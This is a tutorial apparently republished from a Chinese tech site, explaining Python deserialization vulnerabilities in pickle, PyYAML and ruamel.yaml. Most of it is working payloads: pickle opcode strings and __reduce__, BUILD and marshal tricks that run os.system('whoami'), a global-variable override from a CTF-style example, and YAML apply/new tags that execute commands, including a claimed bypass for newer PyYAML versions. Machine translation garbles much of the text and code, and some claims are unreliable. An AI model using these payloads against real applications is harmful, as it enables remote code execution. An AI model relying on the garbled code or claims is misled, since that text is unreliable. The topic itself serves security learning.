Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

Example Analysis of Python deserialization

2025-01-16 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Development >

Share

Shulou(Shulou.com)06/01 Report--

This article shares with you the content of a sample analysis of Python deserialization. The editor thinks it is very practical, so share it with you as a reference and follow the editor to have a look.

Python deserialization vulnerability Pickle

Serialization: pickle.dumps () serializes the object into a string, and pickle.dump () stores the serialized string as a file

Deserialization: pickle.loads () deserializes strings into objects, pickle.load () reads data from files to deserialize

When using dumps () and loads (), you can use the protocol parameter to specify the protocol version

The protocol has 0 python version 1, 2, 3, 4, 5. Different versions of the protocol default to different versions of the protocol. Of these versions, the number 0 is the most readable, and later versions add unprintable characters for optimization.

The protocol is backward compatible, and version 0 can also be used directly.

Serializable object

None, True and False

Integer, floating point, plural

Str 、 byte 、 bytearray

Contains only collections of sealable objects, including tuple, list, set, and dict

The function defined at the outermost layer of the module (using def definition, but not lambda function)

The built-in function defined at the outermost layer of the module

The class defined at the outermost layer of the module

A class whose _ _ dict__ attribute value or the return value of the _ _ getstate__ () function can be serialized (see Pickling Class Instances in the official documentation for details)

Deserialization process

The underlying implementation of the pickle.load () and pickle.loads () methods is based on the _ Unpickler () method to deserialize

During deserialization, _ Unpickler (hereinafter called the machine) maintains two things: the stack area and the storage area.

To study it, you need to use a debugger pickletools

[external link image transfer failed. The origin server may have hotlink protection mechanism. It is recommended to save the image and upload it directly (img-wUDq6S9E-1642832623478) (C:\ Users\ Administrator\ AppData\ Roaming\ Typora\ typora-user-images\ image-20220121114238511.png)]

As can be seen from the figure, the serialized string is actually a string of PVM (Pickle Virtual Machine) instructions, which are stored and parsed in the form of a stack.

PVM instruction set

The complete PVM instruction set can be viewed in pickletools.py. The instruction set used by different protocol versions varies slightly.

The script in the figure above can be translated into:

0:\ x80 PROTO 3 # Protocol version 2:] EMPTY_LIST # pushes the empty list onto stack 3: (MARK # pushes the flag onto stack 4: X BINUNICODE'a'# unicode character 10: X BINUNICODE 'b' 16: X BINUNICODE 'c' 22: e APPENDS (MARK at 3) # pushes the data after Standard 3 into list 23:. STOP # pops up the data in the stack and ends with highest protocol among opcodes = 2

There are several important scripts in the instruction set:

GLOBAL = swap c'# pushes two strings ending in the exchange behavior onto the stack, the first is the module name and the second is the class name, that is, the value of the global variable xxx.xxx can be called

REDUCE = bounded R' # pushes the object generated by callable tuples and parameter tuples into the stack, that is, the first value returned by _ _ reduce () is the executable function, and the second value is the parameter, executing the function

BUILD = broomb' # builds the object through _ _ setstate__ or update _ _ dict__. If the object has a _ _ setstate__ method, anyobject.__ setstate__ (parameter) is called; if there is no _ _ setstate__ method, the value is updated through anyobject.__dict__.update (argument) (the update may produce variable overrides)

STOP = baked.'# end

A more complex example:

Import pickleimport pickletoolsclass a_class (): def _ _ init__ (self): self.age = 24 self.status = 'student' self.list = [' averse, 'baked,' c'] a_class_new = a_class () a_class_pickle = pickle.dumps (a_class_new Protocol=3) print (a_class_pickle) # optimize a packaged string a_list_pickle = pickletools.optimize (a_class_pickle) print (a_class_pickle) # disassemble a packaged string pickletools.dis (a_class_pickle) 0:\ x80 PROTO 3 2: C GLOBAL'_ main__ ajar class' 20:) EMPTY_TUPLE # will be empty Group push stack 21:\ x81 NEWOBJ # indicates that the content of the previous stack is a class (_ _ main__ a_class) Then for a tuple (tuple pushed in 20 lines), call cls.__new__ (cls, * args) (that is, create an instance with the parameters in the tuple Here the tuple is actually empty) 22:} EMPTY_DICT # push the empty dictionary onto stack 23: (MARK 24: X BINUNICODE 'age' 32: K BININT1 24 34: X BINUNICODE' status' 45: X BINUNICODE 'student' 57: X BINUNICODE' list' 66:] EMPTY_LIST 67: (MARK 68: X BINUNICODE 'a' 74: X BINUNICODE 'b' 80: X BINUNICODE 'c' 86: e APPENDS (MARK at 67) 87: U SETITEMS (MARK at 23) # will add the values passed in from line 23 as key-value pairs to the existing dictionary 88: B BUILD # update dictionary to complete construction of 89:. STOPhighest protocol among opcodes = 2 common function execution

There are three PVM instruction sets related to function execution: r, I, o, so we can construct them from three directions:

R:

B'''cossystem (Sparta who amiable t.

I:

Bachelors'(Sweewhoamiamitis iossystem.roommates'

O:

Execute the command'(cossystemS'whoami'o.'''__reduce () _)

The _ _ recude () _ magic function is automatically called at the end of the deserialization process and returns a tuple. The first element is a callable object, which is called when the initial version of the object is created, and the second element is the parameter of the callable object, which may cause RCE vulnerabilities when deserialization.

The instruction code that triggers _ _ reduce () _ is ``R _ instruction * as long as there is an R instruction in the serialized string * *, the reduce method will be executed, regardless of whether the reduce` method is specified in the normal program or not.

Pickle automatically import modules that are not introduced when deserializing, so all code execution and command execution functions in the python standard library can be used, but the python version of payload generated had better be consistent with the target.

Example:

Class a_class (): def _ reduce__ (self): return os.system, ('whoami',) # _ reduce__ () the return value of the magic method: # os.system, (' whoami',) # 1. Satisfies the return of a tuple with at least two parameters # 2. The first argument is the called function: os.system () # 3. The second parameter is a tuple: ('whoami',), and the called parameter' whoami' in the tuple is the parameter # 4 of the called function. Therefore, the code parsed during serialization is os.system ('whoami') b'\ X80\ x03cnt\ nsystem\ nq\ X00X\ X06\ X00\ X00\ x00whoamiq\ X01\ X85q\ x02Rq\ x03.roomb'\ X80\ x03cnt\ nsystem\ nX\ X06\ X00\ x00whoami\ x85R.0:\ x80 PROTO 3 2: C GLOBAL' nt system' 13: X BINUNICODE 'whoami' 24:\ X85 TUPLE1 25: r REDUCE 26:. STOPhighest protocol among opcodes = 2

When the string is deserialized, the command os.system ('whoami') is executed

Global variable coverage

_ _ reduce () _ uses the R script to create REC, while the GLOBAL = bounded c 'script can trigger global variable overrides

# secret.pya = aaaaaa# unser.pyimport secretimport pickleclass flag (): def _ _ init__ (self, a): self.a = ayour_payload = b'?'other_flag = pickle.loads (your_payload) secret_flag = flag (secret) if other_flag.a = = secret_flag.a: print ('flag: {}' .format (secret_flag.a)) else: print ('Notification')

How do you get secret.a without knowing flag?

First try to get the serialized string of flag ():

Class flag (): def _ _ init__ (self, a): self.a = anew_flag = pickle.dumps (Flag ("A") Protocol=3) flag = pickletools.optimize (new_flag) print (flag) print (pickletools.dis (new_flag)) b'\ x80\ x03c mainstay _\ nFlag\ n)\ x81} X\ X01\ X00\ x00aX\ X01\ X00\ x00Asb.0:\ x80 PROTO 3 2: C GLOBAL'_ main__ Flag' 17: Q BINPUT 0 19:) EMPTY_TUPLE 20:\ x81 Asb21 Q BINPUT 1 23:} EMPTY_DICT 24: Q BINPUT 2 26: X BINUNICODE'a'32: Q BINPUT 3 34: X BINUNICODE'A'40: Q BINPUT 4 42: s SETITEM 43: B BUILD 44:. STOPhighest protocol among opcodes = 2

As you can see, the parameter is passed on line 34, assigning the variable A to a. If you change A to the global variable secret.a, change X BINUNICODE'A'to c GLOBAL 'secret a' (X\ X01\ X00\ x00\ x00A to csecret\ na\ n). After the string is deserialized, the value of self.an is equal to that of secret.a, and flag is obtained successfully.

In addition to rewriting the PVM instruction, you can use the exec function to cause variable overrides:

Test1=' test1'test2 = 'test2'class A: def _ _ reduce (self): retutn exec, "test1='asd'\ ntest2='qwe'" uses the BUILD instruction RCE (does not use the R instruction)

Through the combination of BUILD instruction and GLOBAL instruction, existing classes can be rewritten into os.system or other functions.

Assuming that a class does not previously have a _ _ setstate__ method, we can use {'_ setstate__': os.system} to BUILE this object

When the BUILD instruction is executed, the update is executed because there is no _ _ setstate__ method, and the _ _ setstate__ method of this object is changed to the os.system we specified.

Next, if we use 'whoami' to BUILD the object again, we will execute setstate (' whoami'), and at this time _ _ setstate__ has been set to os.system, so we have implemented RCE

Example:

There is an arbitrary class in the code:

Class payload: def _ _ init__ (self): pass

Construct PVM instructions from this class:

0:\ x80 PROTO 3 2: C GLOBAL'_ main__ payload' 17: Q BINPUT 0 19:) EMPTY_TUPLE 20:\ x81 NEWOBJ 21:} EMPTY_DICT # use BUILD First put in a dictionary 22: (MARK # put a flag 23: v UNICODE'_ setstate__' # before putting the value to 37: C GLOBAL'nt system' 48: U SETITEMS (MARK at 22) 49: b BUILD # first BUILD 50: v UNICODE 'whoami' # plus parameter 58: B BUILD # second BUILD 59:. STOP

Rewrite the above PVM instruction into bytes form: B'\ x80\ x03cordered maintainable _\ npayload\ n)\ x81} (Vroomsetstatedirected _\ ncnt\ nsystem\ nubVwhoami\ nb.', successfully executes the command after deserialization using piclke.loads ()

Using Marshal module to cause arbitrary function execution

Pickle cannot serialize code objects, but python provides a module Marshal that can serialize code objects

But serialized code objects can no longer use _ _ reduce () _ calls, because _ _ reduce__ is executed by calling a callable object and passing parameters, and our function itself is a callable object, and we need to execute it instead of taking it as an argument to a function. Hiding requires the use of typres modules to dynamically create anonymous functions.

Import marshalimport typesdef code (): import os print ('hello') os.system (' whoami') code_pickle = base64.b64encode (marshal.dumps (code.__code__)) # python2 is code.func_codetypes.FunctionType (marshal.loads (base64.b64decode (code_pickle)), globals (),') () # dynamically create anonymous functions using types and execute them

Use on pickle:

Import pickle# rewrites types.FunctionType (marshal.loads (base64.b64decode (code_pickle)), globals (),'') () into the form PVM s = b "ctypesFunctionType (cmarshalloads (cbase64b64decode (S'4wAAAAAAAAAAAAAAAAEAAAADAAAAQwAAAHMeAAAAZAFkAGwAfQB0AWQCgwEBAHwAoAJkA6EBAQBkAFMAKQRO6QAAAADaBWhlbGxv2gZ3aG9hbWkpA9oCb3PaBXByaW502gZzeXN0ZW0pAXIEAAAAqQByBwAAAPogRDovUHl0aG9uL1Byb2plY3QvdW5zZXJpYWxpemUucHnaBGNvZGUlAAAAcwYAAAAAAQgBCAE='tRtRc__builtin__globals (tR." pickle.loads (s) # string converted to bytes vulnerability location)

When resolving authentication token and session

Store the object in a disk file after pickle

Transfer the object in the network after pickle

Parameters are passed to the program

PyYAML

Yaml is a markup language, similar to xml and json, each language that supports yaml format will have its own implementation to parse (read and save) the yaml format. PyYAML is the python implementation of yaml.

When using the PyYAML library, if you use yaml.load () instead of yaml.safe_load () function to parse yaml files, it will lead to deserialization vulnerabilities.

Principle

PyYAML has a list of handling functions for tag parsing specific to the python language, three of which are object-related:

!! python/object: = > Constructor.Constructor.construct

For example:

# Test.pyimport yamlimport osclass test: def _ _ init__ (self): os.system ('whoami') payload = yaml.dump (test ()) fp = open (' sample.yml', 'w') fp.write (payload) fp.close ()

After the code is executed, a sample.yml is generated and written to!! python/object:__main__.test {}

Change the contents of the file to!! python/object:Test.test {} and then use yaml.load () to parse the yaml file:

Import yamlyaml.load (file ('sample.yml', 'w'))

The command was executed successfully. However, the execution of the command depends on the existence of Test.py, because yaml.load () reads the test object (class) in Test.py according to the instructions in the yml file. If you delete Test.py, it will also fail to run.

PayloadPyYAML

< 5.1 想要消除依赖执行命令,就需要将其中的类或者函数换成 python 标准库中的类或函数,并使用另外两种 python 标签: # 该标签可以在 PyYAML 解析再入 YAML 数据时,动态的创建 Python 对象!!python/object/apply: =>

Constructor.construct_python_object_apply# this tag calls applyroompythonandobject Constructor.construct_python_object_apply#: = > Constructor.construct_python_object_new

With these two tags, you can construct any payload:

! python/object/apply:subprocess.check_output [[calc.exe]]!! python/object/apply:subprocess.check_output ["calc.exe"]!! python/object/apply:subprocess.check_output [["calc.exe"]]!! python/object/apply:os.system ["calc.exe"]!! python/object/new:subprocess.check_output [["calc.exe"]]!! python/object/new:os.system ["calc.exe"] PyYAML > = 5.1

After version PyYAML > = 5.1, the deserialization of built-in class methods and the import and use of non-existent deserialization code are restricted, and the loader parameter is required when using the load () method, which will give a security warning when used directly.

There are four types of loader:

BaseLoader: load only the most basic YAML

SafeLoader: safely loads a subset of the YAML language, recommended for untrusted input (safe_load)

FullLoader: load the complete Yaml language to avoid arbitrary code execution, which is the current (PyYAML 5.1) default loader calls yaml.load (input) (after warning) (full_load)

UnsafeLoader (also known as Loader backward compatibility): raw Loader code that can be easily exploited through untrusted data entry (unsafe_load)

Prior to the higher version, payload has expired, but you can use the subporcess.getoutput () method to bypass detection:

!! python/object/apply:subprocess.getoutput- whoami

On the latest version, the command was executed successfully

Ruamel.yaml

The usage of ruamel.yaml is basically the same as that of PyYAML, and newer YAML1.2 versions are supported by default.

To deserialize a serialization class method with parameters in ruamel.yaml, there are the following methods:

Load (data)

Load (data, Loader=Loader)

Load (data, Loader=UnsafeLoader)

Load (data, Loader=FullLoader)

Load_all (data)

Load_all (data, Loader=Loader)

Load_all (data, Loader=UnSafeLoader)

Load_all (data, Loader=FullLoader)

We can use any of the above methods, and even we can call load () directly by providing data for deserialization, which will deserialize it perfectly, and our class methods will be executed.

Thank you for reading! This is the end of this article on "sample analysis of Python deserialization". I hope the above content can be of some help to you, so that you can learn more knowledge. if you think the article is good, you can share it for more people to see!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Development

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report